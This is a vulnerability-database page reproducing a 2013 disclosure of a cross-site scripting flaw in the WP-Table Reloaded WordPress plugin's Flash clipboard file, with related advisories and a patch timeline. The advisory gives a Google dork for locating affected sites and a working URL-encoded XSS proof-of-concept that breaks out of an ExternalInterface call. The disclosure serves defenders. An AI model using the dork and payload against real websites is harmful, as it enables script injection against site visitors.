Vulners
Lucene search
WordPress WP-Table-Reloaded Cross Site Scripting
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | CVE-2013-1463 | 24 Jan 201300:00 | – | circl |
 | CVE-2013-1463 | 7 Feb 201302:00 | – | cve |
 | CVE-2013-1463 | 7 Feb 201302:00 | – | cvelist |
 | EUVD-2013-1499 | 7 Oct 202500:30 | – | euvd |
 | CVE-2013-1463 | 7 Feb 201305:56 | – | nvd |
 | WordPress WP Table Reloaded Plugin - Cross Site Scripting | 24 Jan 201300:00 | – | patchstack |
 | Cross site scripting | 7 Feb 201305:56 | – | prion |
| Cross site scripting | 2 Apr 201303:23 | – | prion |
 | PT-2013-3149 · WordPress +1 · Wp-Table Reloaded | 7 Feb 201300:00 | – | ptsecurity |
 | stapler-adjunct-zeroclipboard: XSS via copying XSS payload into buffer | 9 Jul 201318:57 | – | redhat |
10
`
# Exploit Title: Wordpress wp-table-reloadedþ plugin cross-site scripting in SWF
# Release Date: 24/01/13
# Author: hip [Insight-Labs]
# Contact: [email protected] | Website: http://insight-labs.org
# Software Link: http://downloads.wordpress.org/plugin/wp-table-reloaded.latest-stable.zip
# Vendor Homepage: http://tobias.baethge.com/
# Tested on: XPsp3
# Infected version: 1.9.4 before
# Google Dork: inurl:/wp-content/plugins/wp-table-reloaded/
-----------------------------------------------------------------------------------------------------------------------
# Introduction:
WP-Table Reloaded enables you to create and manage tables,
without having to write HTML code, and it adds valuable functions for your visitors.
-------------------------------------------------------------------------------------------------------------------------
# XSS - Proof Of Concept:
vulnerable path:
/wp-content/plugins/wp-table-reloaded/js/tabletools/zeroclipboard.swf
vulnerabile parameter:id
piece of code:
flashvars = LoaderInfo(this.root.loaderInfo).parameters;
this.domId = flashvars.id; <-- vulnerable input
ExternalInterface.call("ZeroClipboard.dispatch", domId, "mouseOver", null); <- vulnerable call
POC:
/wp-content/plugins/wp-table-reloaded/js/tabletools/zeroclipboard.swf?id=a\%22%29%29}catch%28e%29{alert%281%29}//
-------------------------------------------------------------------------------------------------------------------------
# Patch:
-- Vendor was notified on the 23/01/2013
-- Vendor released version 1.9.4 on 27/01/2013 Fixed the bug
-- Reward 50 USD from white fir design on 30/01/2013
-------------------------------------------------------------------------------------------------------------------------
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Jan 2013 00:00Current
6.5Medium risk
Vulners AI Score6.5
EPSS0.08179